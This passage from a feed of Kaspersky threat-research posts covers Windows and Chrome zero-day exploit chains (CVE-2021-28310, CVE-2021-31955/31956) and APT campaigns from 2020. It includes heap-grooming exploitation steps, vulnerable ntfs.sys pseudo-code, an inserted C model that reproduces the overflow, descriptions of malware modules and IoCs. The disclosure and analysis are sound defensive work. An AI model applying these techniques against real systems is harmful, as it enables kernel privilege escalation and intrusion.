The propertiesCount check in the kernel could be bypassed this way and malicious commands would be passed to Desktop Window Manager (dwm.exe).

An inconsistency between the number of properties assigned to the same resource in kernel mode and user mode could be a source of other vulnerabilities, so we recommend that Microsoft change the behavior of the AddProperty function and check properties before they are added.

The whole exploitation process for the discovered exploit is as follows:

 1. Create a large number of resources with properties of a specific size to get the heap into a predictable state.
 2. Create additional resources with properties of a specific size and content to spray memory at specific locations with fake properties.
 3. Release the resources created at stage 2.
 4. Create additional resources with properties. These resources will be used to perform OOB writes.
 5. Make holes among the resources created at stage 1.
 6. Create additional properties for the resources created at stage 4. Their buffers are expected to be allocated at specific locations.
 7. Create "special" properties to cause an inconsistency between the number of properties assigned to the same resource in kernel mode and user mode for the resources created at stage 4.
 8. Use the OOB write vulnerability to write shellcode, create an object and get code execution.
 9. Inject additional shellcode into another system process.

Kaspersky products detect this exploit with the verdicts:

 * HEUR:Exploit.Win32.Generic
 * HEUR:Trojan.Win32.Generic
 * PDM:Exploit.Win32.Generic
", "cvss3": {}, "published": "2021-04-13T17:35:50", "type": "securelist", "title": "Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0797", "CVE-2021-1732", "CVE-2021-28310"], "modified": "2021-04-13T17:35:50", "id": "SECURELIST:A3D3514100806269750A23D748D34C59", "href": "https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-15T08:32:02", "description": "

On April 14-15, 2021, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. While we were not able to retrieve the exploit used for remote code execution (RCE) in the Chrome web browser, we were able to find and analyze an elevation of privilege (EoP) exploit that was used to escape the sandbox and obtain system privileges.

The elevation of privilege exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2) and it exploits two distinct vulnerabilities in the Microsoft Windows OS kernel. On April 20, 2021, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the information disclosure vulnerability and CVE-2021-31956 to the elevation of privilege vulnerability. Both vulnerabilities were patched on June 8, 2021, as a part of the June Patch Tuesday.

## Remote code execution exploit

All of the observed attacks were conducted through the Chrome browser.
Unfortunately, we were unable to retrieve the JavaScript with the full exploit code, but the timeframe of the attacks and the events preceding it led us to suspect one particular vulnerability.

On April 6-8, 2021 the Pwn2Own competition took place. This is a computer hacking contest where the Google Chrome web browser was one of the targets. According to the ZDI (Zero Day Initiative, the organizer of Pwn2Own) [website](<https://www.zerodayinitiative.com/blog/2021/4/2/pwn2own-2021-schedule-and-live-results>), one participating team was able to demonstrate successful exploitation of the Chrome renderer process using a Typer Mismatch bug.

On April 12, 2021, the developers of Chromium committed two (issue [1196683](<https://chromium-review.googlesource.com/c/v8/v8/+/2820971>), issue [1195777](<https://chromium-review.googlesource.com/c/v8/v8/+/2817791>)) Typer-related bug fixes to the open-source repository of V8 – a JavaScript engine used by Chrome and Chromium web browsers. One of these bug fixes (issue [1196683](<https://chromium-review.googlesource.com/c/v8/v8/+/2820971>)) was intended to patch a vulnerability that was used during Pwn2Own, and both bug fixes were committed together with regression tests – JavaScript files to trigger these vulnerabilities. Later on the same day, a user with the Twitter handle @r4j0x00 published a working remote code execution exploit on GitHub, targeting an up-to-date version of Google Chrome. That exploit used a vulnerability from issue [1196683](<https://chromium-review.googlesource.com/c/v8/v8/+/2820971>) to execute a shellcode in the context of the browser renderer process.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/07122836/PuzzleMaker_attacks_01.png>)

**_Screenshot of tweet with Chrome zero-day published on April 12, 2021_**

The published exploit didn't contain a sandbox escape exploit and was therefore intended to work only when the browser was launched with the command line option _-no-sandbox_.

On April 13, 2021, Google released Chrome update 89.0.4389.128 for Windows, Mac and Linux with a fix for two vulnerabilities; CVE-2021-21220 (used during Pwn2Own) was one of them.

Some of our customers who were attacked on April 14-15, 2021, already had their Chrome browser updated to 89.0.4389.128, and that's why we think the attackers didn't use CVE-2021-21220 in their attacks.

On April 14, 2021, Google released Chrome update 90.0.4430.72 for Windows, Mac and Linux with a fix for 37 vulnerabilities. On the same day, a new Chrome exploit was presented to the public.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/07122912/PuzzleMaker_attacks_02.png>)

**_Screenshot of GitHub repository with Chrome zero-day published on April 14, 2021_**

This newly published exploit used a vulnerability from issue [1195777](<https://chromium-review.googlesource.com/c/v8/v8/+/2817791>), worked on the newly released Chrome 90.0.4430.72, and was fixed as CVE-2021-21224 only a few days later, on April 20, 2021.

We suspect the attackers were also able to use this JavaScript file with the regression test to develop the exploit (or acquire it from someone else) and were probably using CVE-2021-21224 in their attacks.

## Elevation of privilege exploit

CVE-2021-31955 is an information disclosure vulnerability in ntoskrnl.exe.
The vulnerability is affiliated with a Windows OS feature called SuperFetch. It was introduced in Windows Vista and is aimed at reducing software loading times by pre-loading commonly used applications into memory. For SuperFetch purposes the function _NtQuerySystemInformation_ implements a special system information class, _SystemSuperfetchInformation_. This system information class incorporates more than a dozen different SuperFetch information classes. The vulnerability lies in the fact that the data returned by the _NtQuerySystemInformation_ function for the SuperFetch information class _SuperfetchPrivSourceQuery_ contains EPROCESS kernel addresses for currently executing processes.

It's noteworthy that this vulnerability can be observed in code that was available on [GitHub](<https://github.com/zodiacon/WindowsInternals/blob/master/MemInfo/MemInfo.cpp>) for a few years before we caught it in the wild and Microsoft patched it.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/07122949/PuzzleMaker_attacks_03.png>)

**_CVE-2021-31955 can be observed in the source code of the MemInfo utility_**

The other vulnerability, CVE-2021-31956, is a heap-based buffer overflow in ntfs.sys. The function _NtfsQueryEaUserEaList_ processes a list of extended attributes for a file and stores the retrieved values to a buffer. This function is accessible via an _ntoskrnl_ syscall and, among other things, it's possible to control the size of the output buffer. If the size of an extended attribute is not aligned, the function calculates a padding so that the next extended attribute is stored 32-bit aligned. The code checks whether the output buffer is long enough to fit the extended attribute with padding, but it doesn't check for a possible integer underflow. As a result, a heap-based buffer overflow can happen.

```c
for ( cur_ea_list_entry = ea_list; ; cur_ea_list_entry = next_ea_list_entry )
{
  ...

  out_buf_pos = (DWORD *)(out_buf + padding + occupied_length);

  if ( NtfsLocateEaByName(eas_blocks_for_file, eas_blocks_size, &name, &ea_block_pos) )
  {
    ea_block = eas_blocks_for_file + ea_block_pos;
    ea_block_size = ea_block->DataLength + ea_block->NameLength + 9;
    if ( ea_block_size <= out_buf_length - padding ) // integer underflow is possible
    {
      memmove(out_buf_pos, (const void *)ea_block, ea_block_size); // heap buffer overflow
      *out_buf_pos = 0;
    }
  }
  else
  {
    ...
  }

  ...

  occupied_length += ea_block_size + padding;
  out_buf_length -= ea_block_size + padding;
  padding = ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;

  ...
}
```

**_Pseudo-code for the vulnerable code in the function NtfsQueryEaUserEaList_**

The exploit uses CVE-2021-31956 along with the Windows Notification Facility (WNF) to create arbitrary memory read and write primitives. We are planning to publish more information about this technique in the future.

As the exploit uses CVE-2021-31955 to get the kernel address of the EPROCESS structure, it is able to use the common post-exploitation technique of stealing the SYSTEM token. However, the exploit uses a rarely used "PreviousMode" technique instead. We have seen this technique used by the CHAINSHOT framework and even made a [presentation](<https://github.com/oct0xor/presentations/blob/master/2019-02-Overview%20of%20the%20latest%20Windows%20OS%20kernel%20exploits%20found%20in%20the%20wild.pdf>) about it at CanSecWest/BlueHat in 2019.
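The length check from the NtfsQueryEaUserEaList pseudo-code above, modelled as an added example (not ntfs.sys code): the loop keeps the pseudo-code's variables and size formula, runs the vulnerable check beside a hardened one that rejects the entry before `out_buf_length - padding` can wrap, and measures how many bytes beyond the output buffer a constructed two-entry EA list would overwrite. The EaDesc layout, the entry sizes and the canary mechanism are assumptions of this model.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed model of the length accounting in the NtfsQueryEaUserEaList
 * pseudo-code above (an added example, not ntfs.sys code). The entries are
 * synthetic; the size formula DataLength + NameLength + 9 and the variable
 * names are taken from the pseudo-code. */

typedef struct { uint8_t NameLength; uint16_t DataLength; } EaDesc;  /* assumed layout */

typedef struct {
    int      accepted;        /* 1 if every entry passed the length check */
    uint32_t bytes_past_end;  /* canary bytes overwritten beyond out_buf_length */
} EaCopyResult;

#define SLACK 256u   /* canary region placed right after the output buffer */

static EaCopyResult query_ea_list(const EaDesc *eas, size_t n,
                                  uint32_t out_buf_length, int hardened)
{
    EaCopyResult r = { 1, 0 };
    const size_t orig_len = out_buf_length;
    const size_t backing  = orig_len + SLACK;
    uint8_t *out_buf = malloc(backing);
    if (!out_buf) { r.accepted = 0; return r; }
    memset(out_buf, 0xAA, backing);                 /* canary pattern everywhere */

    uint32_t occupied_length = 0, padding = 0;
    for (size_t i = 0; i < n; i++) {
        uint32_t ea_block_size = eas[i].DataLength + eas[i].NameLength + 9;
        int fits;
        if (hardened)
            /* reject before out_buf_length - padding can wrap */
            fits = padding <= out_buf_length && ea_block_size <= out_buf_length - padding;
        else
            /* vulnerable: wraps to ~4 GiB when padding > out_buf_length */
            fits = ea_block_size <= out_buf_length - padding;
        if (!fits) { r.accepted = 0; break; }

        size_t pos = (size_t)occupied_length + padding;   /* out_buf_pos */
        size_t len = ea_block_size;
        if (pos >= backing) len = 0;                      /* keep the model itself memory-safe */
        else if (pos + len > backing) len = backing - pos;
        memset(out_buf + pos, 0x00, len);   /* stands in for memmove(out_buf_pos, ea_block, ...) */

        occupied_length += ea_block_size + padding;
        out_buf_length  -= ea_block_size + padding;
        padding = ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;
    }

    /* Anything past the caller-supplied length that is no longer canary was clobbered. */
    for (size_t k = orig_len; k < backing; k++)
        if (out_buf[k] != 0xAA) r.bytes_past_end++;
    free(out_buf);
    return r;
}

int main(void)
{
    /* Constructed list: entry 0 is 18 bytes (6+3+9), so a caller-supplied buffer of
     * exactly 18 bytes leaves out_buf_length = 0 and padding = 2 for entry 1. */
    const EaDesc eas[2] = { { 3, 6 }, { 4, 100 } };
    EaCopyResult v = query_ea_list(eas, 2, 18, 0);
    EaCopyResult h = query_ea_list(eas, 2, 18, 1);
    printf("vulnerable: accepted=%d bytes_past_end=%u\n", v.accepted, v.bytes_past_end); /* 1, 113 */
    printf("hardened:   accepted=%d bytes_past_end=%u\n", h.accepted, h.bytes_past_end); /* 0, 0 */
    return 0;
}
```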
The exploit uses the PreviousMode technique to inject a malware module into the system process and execute it.

## Malware modules

Besides the aforementioned exploits, the full attack chain consists of four additional malware modules, which will be referred to as:

 * Stager
 * Dropper
 * Service
 * Remote shell

The stager module is used to notify that exploitation was successful. It also downloads and executes a more complex malware dropper module from a remote server. Each stager module is delivered to the victim with a personalized configuration blob that defines the C&C URL, Session ID, keys to decrypt the next stage of malware, and other information.

All the stager module samples that we've discovered so far were configured to use the same URL address – hxxps://p{removed}/metrika_upload/index.php – to download the encrypted malware dropper module.

We believe there is a chance that the remote code execution JavaScript exploit was also hosted on the same legitimate-looking geopolitical news portal, but we found no evidence of a classic watering hole attack. The victimology suggests a highly targeted delivery of exploits.

The dropper module is used to install two executables that pretend to be legitimate files belonging to the Microsoft Windows OS. One of these files (%SYSTEM%\WmiPrvMon.exe) is registered as a service and is used as a launcher for the second executable. This second executable (%SYSTEM%\wmimon.dll) has the functionality of a remote shell and can be considered the main payload of the attack. We couldn't find any similarities between this and other known malware.

The remote shell module has a hardcoded URL of the C&C server inside (media-seoengine[.]com). All the communication between the C&C server and client is authorized and encrypted. The remote shell module is able to download and upload files, create processes, sleep for specified amounts of time and delete itself from the compromised machine.

None of the artifacts we analyzed appear to have strong connections to any known threat actors. The only similarity to CHAINSHOT we observed is the "PreviousMode" technique, although this is publicly known and may be used by various groups. We are calling the threat actor behind these attacks PuzzleMaker.

Kaspersky products detect this exploit and malware modules with the verdicts:

 * PDM:Exploit.Win32.Generic
 * PDM:Trojan.Win32.Generic
 * UDS:DangerousObject.Multi.Generic

Kaspersky products detected these attacks with the help of the Behavioral Detection Engine and the Exploit Prevention component. Over the past few years, we have built a multitude of exploit protection technologies into our products that have detected many zero-days, repeatedly proving their effectiveness. We will continue to improve defenses for our users by enhancing technologies and working with third-party vendors to patch vulnerabilities, making the internet more secure for everyone.

More information about these attacks and the actor behind them is available to customers of the Kaspersky Intelligence Reporting service.
Contact: intelreports@kaspersky.com.

Kaspersky would like to thank Microsoft for their prompt analysis of the report and patches.

## IoCs

media-seoengine[.]com

**%SYSTEM%\WmiPrvMon.exe**

MD5 [09A5055DB44FC1C9E3ADD608EFFF038C](<https://opentip.kaspersky.com/09A5055DB44FC1C9E3ADD608EFFF038C/>)
SHA-1 [BFFA4462901B74DBFBFFAA3A3DB27DAA61211412](<https://opentip.kaspersky.com/BFFA4462901B74DBFBFFAA3A3DB27DAA61211412/>)
SHA-256 [982F7C4700C75B81833D5D59AD29147C392B20C760FE36B200B541A0F841C8A9](<https://opentip.kaspersky.com/982F7C4700C75B81833D5D59AD29147C392B20C760FE36B200B541A0F841C8A9/>)

**%SYSTEM%\wmimon.dll**

MD5 [D6B850C950379D5EE0F254F7164833E8](<https://opentip.kaspersky.com/D6B850C950379D5EE0F254F7164833E8/>)
SHA-1 [E63ED3B56A5F9A1EA5C92D3D2444196EA13BE94B](<https://opentip.kaspersky.com/E63ED3B56A5F9A1EA5C92D3D2444196EA13BE94B/>)
SHA-256 [8A17279BA26C8FBE6966EA3300FDEFB1ADAE1B3ED68F76A7FC81413BD8C1A5F6](<https://opentip.kaspersky.com/8A17279BA26C8FBE6966EA3300FDEFB1ADAE1B3ED68F76A7FC81413BD8C1A5F6/>)
", "cvss3": {}, "published": "2021-06-08T17:32:30", "type": "securelist", "title": "PuzzleMaker attacks with Chrome zero-day exploit chain", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-21220", "CVE-2021-21224", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-06-08T17:32:30", "id": "SECURELIST:8E9198BF0E389572981DD1AA05D0708A", "href": "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-04T08:16:24", "description": "

For more than three years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports.
They are designed to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q3 2020.

Readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).

## The most remarkable findings

We have already partly documented the activities of DeathStalker, a unique threat group that seems to focus mainly on law firms and companies operating in the financial sector. The group's interest in gathering sensitive business information leads us to believe that DeathStalker is a group of mercenaries offering hacking-for-hire services, or acting as an information broker in financial circles. The activities of this threat actor first came to our attention through a PowerShell-based implant called Powersing. This quarter, we unraveled the threads of DeathStalker's LNK-based Powersing intrusion workflow. While there is nothing groundbreaking in the whole toolset, we believe defenders can gain a lot of value by understanding the underpinnings of a modern, albeit low-tech, infection chain used by a successful threat actor. DeathStalker continues to develop and use this implant, using tactics that have mostly been identical since 2018, while making greater efforts to evade detection. In August, our [public report of DeathStalker's activities](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) summarized the three scripting language-based toolchains used by the group – Powersing, Janicab and Evilnum.

Following our initial private report on Evilnum, we detected a new batch of implants in late June 2020, showing interesting changes in the (so far) quite static modus operandi of DeathStalker. For instance, the malware directly connects to a C2 server using an embedded IP address or domain name, as opposed to previous variants where it made use of at least two dead drop resolvers (DDRs) or web services, such as forums and code sharing platforms, to fetch the real C2 IP address or domain. Interestingly, for this campaign the attackers didn't limit themselves merely to sending spear-phishing emails but actively engaged victims through multiple emails, persuading them to open the decoy, to increase the chance of compromise. Furthermore, aside from using Python-based implants throughout the intrusion cycle, in both new and old variants, this was the first time that we had seen the actor dropping PE binaries as intermediate stages to load Evilnum, while using advanced techniques to evade and bypass security products.

We also found another intricate, low-tech implant that we attribute to DeathStalker with medium confidence. The delivery workflow uses a Microsoft Word document and drops a previously unknown PowerShell implant that relies on DNS over HTTPS (DoH) as a C2 channel. We dubbed this implant PowerPepper.

During a recent investigation of a targeted campaign, we found a UEFI firmware image containing rogue components that drop previously unknown malware to disk. Our analysis showed that the revealed firmware modules were based on a known bootkit named Vector-EDK, and the dropped malware is a downloader for further components. By pivoting on unique traits of the malware, we uncovered a range of similar samples from our telemetry that have been used against diplomatic targets since 2017 and have different infection vectors. While the business logic of most is identical, we could see that some had additional features or differed in implementation. Due to this, we infer that the bulk of samples originate from a bigger framework that we have dubbed [MosaicRegressor](<https://securelist.com/mosaicregressor/98849/>). Code artefacts in some of the framework's components, and overlaps in C2 infrastructure used during the campaign, suggest that a Chinese-speaking actor is behind these attacks, possibly one that has connections to groups using the Winnti backdoor. The targets, diplomatic institutions and NGOs in Asia, Europe and Africa, all appear to be connected in some way to North Korea.

## Europe

Since publishing our initial report on WellMess (see our [_APT trends report Q2 2020_](<https://securelist.com/apt-trends-report-q2-2020/97937/>)), the UK National Cyber Security Centre (NCSC) has released a joint technical advisory, along with the Canadian and US governments, on the most recent activity involving WellMess. Specifically, all three governments attribute the use of this malware targeting COVID-19 vaccine research to The Dukes (aka APT29 and Cozy Bear). The advisory also details two other pieces of malware, SOREFANG and WellMail, that were used during this activity. Given the direct public statement on attribution, new details provided in the advisory, as well as new information discovered since our initial investigation, we published our report to serve as a supplement to our previous reporting on this threat actor. While the publication of the NCSC advisory has increased general public awareness of the malware used in these recent attacks, the attribution statements made by all three governments provided no clear evidence for other researchers to pivot on for confirmation. For this reason, we are currently unable to modify our original statement; and we still assess that the WellMess activity has been conducted by a previously unknown threat actor. We will continue to monitor for new activity and adjust this statement in the future if new evidence is uncovered.

## Russian-speaking activity

In summer, we uncovered a previously unknown multimodule C++ toolset used in highly targeted industrial espionage attacks dating back to 2018.
So far, we have seen no similarities with known malicious activity regarding code, infrastructure or TTPs. To date, we consider this toolset and the actor behind it to be new. The malware authors named the toolset MT3, and based on this abbreviation we have named the toolset [MontysThree](<https://securelist.com/montysthree-industrial-espionage/98972/>). The malware is configured to search for specific document types, including those stored on removable media. It contains natural language artefacts of correct Russian and a configuration that seeks directories that exist only in Cyrillic versions of Windows, while presenting some false flag artefacts suggesting a Chinese-speaking origin. The malware uses legitimate cloud services such as Google, Microsoft and Dropbox for C2 communications.

## Chinese-speaking activity

Earlier this year, we discovered an active and previously unknown stealthy implant dubbed Moriya in the networks of regional inter-governmental organizations in Asia and Africa. This tool was used to control public-facing servers in those organizations by establishing a covert channel with a C2 server and passing shell commands and their outputs to the C2. This capability is facilitated using a Windows kernel mode driver. Use of the tool is part of an ongoing campaign that we have named TunnelSnake. The rootkit was detected on the targeted machines in May, with activity dating back as early as November 2019, persisting in networks for several months following the initial infection. We found another tool showing significant code overlaps with this rootkit, suggesting that the developers have been active since at least 2018. Since neither the rootkit nor the other lateral movement tools that accompanied it during the campaign relied on hard-coded C2 servers, we could gain only partial visibility into the attacker's infrastructure.
That said, the bulk of detected tools, apart from Moriya, consisted of both proprietary and well-known pieces of malware that were previously used by Chinese-speaking threat actors, giving a clue to the attacker's origin.

PlugX continues to be effectively and heavily used across Southeast and East Asia, and also Africa, with some minimal use in Europe. The PlugX codebase has been in use by multiple Chinese-speaking APT groups, including HoneyMyte, Cycldek and LuckyMouse. Government agencies, NGOs and IT service organizations seem to be consistent targets. While the new USB spreading capability is opportunistically pushing the malware throughout networks, compromised MSSPs/IT service organizations appear to be a potential vector of targeted delivery, with CobaltStrike installer packages pushed to multiple systems for initial PlugX installation. Based on our visibility, the majority of activity in the last quarter appears to be in Mongolia, Vietnam and Myanmar. The number of systems in these countries dealing with PlugX in 2020 is at the very least in the thousands.

We discovered an ongoing campaign, dating back to May, utilizing a new version of the Okrum backdoor, attributed to Ke3chang. This updated version of Okrum uses an Authenticode-signed Windows Defender binary using a unique side-loading technique. The attackers used steganography to conceal the main payload in the Defender executable while keeping its digital signature valid, reducing the chance of detection. We haven't previously seen this method being used in the wild for malicious purposes. We have observed one affected victim, a telecoms company located in Europe.

On September 16, the [US Department of Justice released three indictments associated with hackers allegedly connected with APT41](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>) and other intrusion sets tracked as Barium, Winnti, Wicked Panda and Wicked Spider. In addition, two Malaysian nationals were also arrested on September 14, in Sitiawan (Malaysia), for "conspiring to profit from computer intrusions targeting the video game industry", following cooperation between the US DoJ and the Malaysian government, including the Attorney General's Chambers of Malaysia and the Royal Malaysia Police. The first indictment alleges that the defendants set up an elite "white hat" network security company, called Chengdu 404 Network Technology Co, Ltd. (aka Chengdu Si Lingsi Network Technology Co., Ltd.), and under its guise, engaged in computer intrusions targeting hundreds of companies around the world. According to the indictment, they "carried out their hacking using specialized malware, such as malware that cyber-security experts named 'PlugX/Fast', 'Winnti/Pasteboy', 'Shadowpad', 'Barlaiy/Poison Plug' and 'Crosswalk/ProxIP'". The indictments contain several indirect IoCs, which allowed us to connect these intrusions to Operation ShadowPad and Operation ShadowHammer, two massive supply-chain attacks discovered and investigated by Kaspersky in recent years.

## Middle East

In June, we observed new activity by the MuddyWater APT group, involving use of a new set of tools that constitute a multistage framework for loading malware modules. Some components of the framework leverage code to communicate with C2s identical to code we observed in the MoriAgent malware earlier this year. For this reason, we decided to dub the new framework MementoMori. The purpose of the new framework is to facilitate execution of further in-memory PowerShell or DLL modules. We detected high-profile victims based in Turkey, Egypt and Azerbaijan.

## Southeast Asia and Korean Peninsula

In May, we found new samples belonging to the Dtrack family. The first sample, named Valefor, is an updated version of the Dtrack RAT containing a new feature enabling the attacker to execute more types of payload.
The second sample is a keylogger called Camio which is an updated version of its keylogger. This new version updates the logged information and its storage mechanism. We observed signs indicating that these malware programs were tailored for specific victims. At the time of our research our telemetry revealed victims located in Japan.\n\nWe have been tracking LODEINFO, fileless malware used in targeted attacks since last December. During this time, we observed several versions as the authors were developing the malware. In May, we detected version v0.3.6 targeting diplomatic organizations located in Japan. Shortly after that, we detected v0.3.8 as well. Our investigation revealed how the attackers operate during the lateral movement stage: after obtaining the desired data, the attackers wipe their traces. Our private report included a technical analysis of the LODEINFO malware and the attack sequence in the victim's network, to disclose the actor's tactics and methods.\n\nWhile tracking Transparent Tribe activity, we discovered an interesting tool used by this APT threat actor: the server component used to manage CrimsonRAT bots. We found different versions of this software, allowing us to look at the malware from the perspective of the attackers. It shows that the main purpose of this tool is file stealing, given its functionalities for exploring the remote file system and collecting files using specific filters. Transparent Tribe (aka PROJECTM and MYTHIC LEOPARD) is a very prolific APT group that has increased its activities in recent months. We reported [the launch of a new wide-ranging campaign that uses the CrimsonRAT tool](<https://securelist.com/transparent-tribe-part-1/98127/>) where we were able to set up and analyze the server component and saw the use of the USBWorm component for the first time; we also found [an Android implant used to target military personnel in India](<https://securelist.com/transparent-tribe-part-2/98233/>). 
This discovery also confirms much of the information already discovered during previous investigations; and it also confirms that CrimsonRAT is still under active development.\n\nIn April, we discovered a new malware strain that we named CRAT, based on the build path and internal file name. The malware was spread using a weaponized Hangul document as well as a Trojanized application and strategic web compromise. Since its discovery the full-featured backdoor has quickly evolved, diversifying into several components. A downloader delivers CRAT to profile victims, followed by next-stage orchestrator malware named SecondCrat: this orchestrator loads various plugins for espionage, including keylogging, screen capturing and clipboard stealing. During our investigation, we found several weak connections with ScarCruft and Lazarus: we discovered that several debugging messages inside the malware have similar patterns to ScarCruft malware, as well as some code patterns and the naming of the Lazarus C2 infrastructure.\n\nIn June, we observed a new set of malicious Android downloaders which, according to our telemetry, have been actively used in the wild since at least December 2019; and have been used in a campaign targeting victims almost exclusively in Pakistan. Its authors used the Kotlin programming language and Firebase messaging system for the downloader, which mimics Chat Lite, Kashmir News Service and other legitimate regional Android applications. A report by the National Telecom & Information Technology Security Board (NTISB) from January describes malware sharing the same C2s and spoofing the same legitimate apps. According to this publication, targets were Pakistani military bodies, and the attackers used WhatsApp messages, SMS, emails and social media as the initial infection vectors. Our own telemetry shows that this malware also spreads through Telegram messenger. 
The analysis of the initial set of downloaders allowed us to find an additional set of Trojans that we believe are strongly related, as they use the package name mentioned in the downloaders and focus on the same targets. These new samples have strong code similarity with artefacts previously attributed to Origami Elephant.\n\nIn mid-July, we observed a Southeast Asian government organization targeted by an unknown threat actor with a malicious ZIP package containing a multilayered malicious RAR executable package. In one of the incidents, the package was themed around COVID-19 containment. We believe that the same organization was probably the same target of a government web server watering-hole, compromised in early July and serving a highly similar malicious LNK. Much like other campaigns against particular countries that we have seen in the past, these adversaries are taking a long-term, multipronged approach to compromising target systems without utilizing zero-day exploits. Notably, another group (probably OceanLotus) used a similar Telegram delivery technique with its malware implants against the same government targets within a month or so of the COVID-19-themed malicious LNK, in addition to its use of Cobalt Strike.\n\nIn May 2020, Kaspersky technologies prevented an attack using a malicious script for Internet Explorer against a South Korean company. Closer analysis revealed that the attack used a previously unknown full chain that consisted of two zero-day exploits: a Remote Code Execution exploit for Internet Explorer and an Elevation of Privilege exploit for Windows. 
Unlike a previous full chain that we discovered, used in Operation WizardOpium (you can read more [here](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), the new full chain targeted the latest builds of Windows 10, and our tests demonstrated reliable exploitation of Internet Explorer 11 and Windows 10 build 18363 x64. On June 8, we reported our discoveries to Microsoft, who confirmed the vulnerabilities. At the time of our report, the security team at Microsoft had already prepared a patch for vulnerability CVE-2020-0986 that was used in the zero-day Elevation of Privilege exploit; but before our discovery, the exploitability of this vulnerability had been considered less likely. The patch for CVE-2020-0986 was released on June 9. Microsoft assigned CVE-2020-1380 to a use-after-free vulnerability in JScript and the patch for this was released on August 11. We are calling this and related attacks [Operation PowerFall](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>). Currently, we are unable to establish a definitive link with any known threat actor, but due to similarities with previously discovered exploits we believe that DarkHotel may be behind this attack.\n\nOn July 22, we came across a suspicious archive file that was uploaded to VirusTotal from an Italian source. The file seemed to be a triage consisting of malicious scripts, access logs, malicious document files and several screenshots related to suspicious file detections from security solutions. After looking into these malicious document files, we identified that they are related to a Lazarus group campaign that we reported in June. This campaign, dubbed DeathNote, targeted the automobile industry and individuals in the academic field using lure documents containing aerospace and defense-related job descriptions. 
We are confident that these documents are related to a recently reported attack on an Israeli defense company. We have uncovered webshell scripts, C2 server scripts and malicious documents, identified several victims connected to the compromised C2 server, and determined the method used to access the C2 server.\n\nWe have observed an ongoing Sidewinder campaign that started in February, using five different malware types. The group made changes to its final payloads and continues to target government, diplomatic and military entities using current themes, such as COVID-19, in its spear-phishing efforts. While the infection mechanism remains the same as before, including the group's exploit of choice (CVE-2017-1182) and use of the DotNetToJScript tool to deploy the final payloads, we found that the actor also used ZIP archives containing a Microsoft compiled HTML Help file to download the last-stage payload. In addition to the existing .NET-based implant, which we call SystemApp, the threat actor added JS Orchestrator, the Rover/Scout backdoor and modified versions of AsyncRAT and warzoneRAT to its arsenal.\n\n## Other interesting discoveries\n\nAttribution is difficult at the best of times, and sometimes it's not possible at all. While investigating an ongoing campaign, we discovered a new Android implant undergoing development, with no clear link to any previously known Android malware. The malware is able to monitor and steal call logs, SMS, audio, video and non-media files, as well as identifying information about the infected device. It also implements an interesting feature to collect information on network routes and topology obtained using the \"traceroute\" command as well as using local ARP caches. During this investigation we uncovered a cluster of similar Android infostealer implants, with one example being obfuscated. 
We also found older Android malware that more closely resembles a backdoor, with traces of it in the wild dating back to August 2019.\n\nIn April, Cisco Talos described the activities of an unknown actor targeting Azerbaijan's government and energy sector using new malware called PoetRAT. In collaboration with Kaspersky ICS CERT, we identified supplementary samples of associated malware and documents with broader targeting of multiple universities, government and industrial organizations as well as entities in the energy sector in Azerbaijan. The campaign started in early November 2019, and the attackers switched off the infrastructure immediately following publication of the Cisco Talos report. We observed a small overlap in victimology with Turla, but since there is no technically sound proof of a relation between them, and we haven't been able to attribute this new set of activity to any other previously known actor, we named it Obsidian Gargoyle.\n\n## Final thoughts\n\nThe TTPs of some threat actors remain fairly consistent over time (such as using hot topics like COVID-19 to entice users to download and execute malicious attachments sent in spear-phishing emails), while other groups reinvent themselves, developing new toolsets and widening their scope of activities, for example, to include new platforms. And while some threat actors develop [very sophisticated tools](<https://securelist.com/mosaicregressor/98849/>), for example, the MosaicRegressor UEFI implant, others [have great success](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) with basic TTPs. 
